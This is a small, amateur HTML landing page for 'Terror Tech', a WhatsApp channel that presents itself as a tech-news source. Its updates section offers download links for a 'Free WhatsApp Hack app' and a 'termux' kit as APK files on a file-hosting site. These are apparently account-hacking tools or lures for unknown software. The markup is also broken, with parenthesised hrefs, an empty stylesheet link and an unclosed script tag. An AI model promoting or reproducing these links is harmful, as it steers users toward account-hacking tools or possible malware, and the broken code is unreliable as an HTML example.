<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Terror Tech</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="()">
</head>
<body>
    <header>
        <nav>
            <ul>
                <li><a href="#home" class="active">Home</a></li>
                <li><a href="#about">About</a></li>
                <li><a href="#updates">Updates</a></li>
                <li><a href="#community">Community</a></li>
            </ul>
        </nav>
    </header>
    <main>
        <section id="home">
            <h1>Welcome to Terror Tech</h1>
            <p>Your ultimate source for tech news and updates.</p>
            
            <div class="slideshow">
                <div class="slide">
                    <img src="image1.png" alt="Slide 1">
                </div>
                <div class="slide">
                    <img src="image2.jpg" alt="Slide 2">
                </div>
                <div class="slide">
                    <img src="image3.jpg" alt="Slide 3">
                </div>
            </div>
        </section>
        <section id="about">
            <h1>About Us</h1>
            <p>Terror Tech is a WhatsApp channel dedicated to providing the latest tech news and updates.
         
            </ul></p>
           
        </section>
        <section id="updates">
            <h1>Latest Updates</h1>
            <ul>
                <li><a href="(https://apkadmin.com/htx6vitt7ne4/Vīdz_Tech_Whatsapp_Hack.apk.html)" target="_blank">Free WhatsApp Hack app</a></li>
                <li><a href="(https://apkadmin.com/cwhldmnjj1dh/Updated_Vīdz_Tech_Kit.apk.html)" target="_blank">Free termux app</a></li>
            </ul>
        </section>
        <section id="community">
            <h1>Join Our Community</h1>
            <p>Join our WhatsApp channel to stay updated on the latest tech news and trends.</p>
            <a href="https://whatsapp.com/channel/0029VarWtitEgGfDrNnWs83N" class="cta-btn">Join Now</a>
        </section>
    </main>
    <footer>
        <p>&copy; 2024 Terror Tech</p>
        <ul>
<li><a href="(https://t.me/JJtotheworld)" class="social-icon.png" target="_blank"><i class="fab fa-telegram">Telegram</i></a></li>
<li><a href="(https://youtube.com/@jhx-1tech?si=XUdgsl853HHSiumy)" class="social-icon.png" target="_blank"><i class="fab fa-youtube">YouTube</i></a></li>
<li><a href="(https://gmail.app.goo.gl.hiltonvidz15@gmail.com)" class="social-icon.png" target="_blank"><i class="fab fa-gmail">G-mail</i></a></li>
        </ul>
    </footer>
    <script src="script.js"></script
</body>
</html>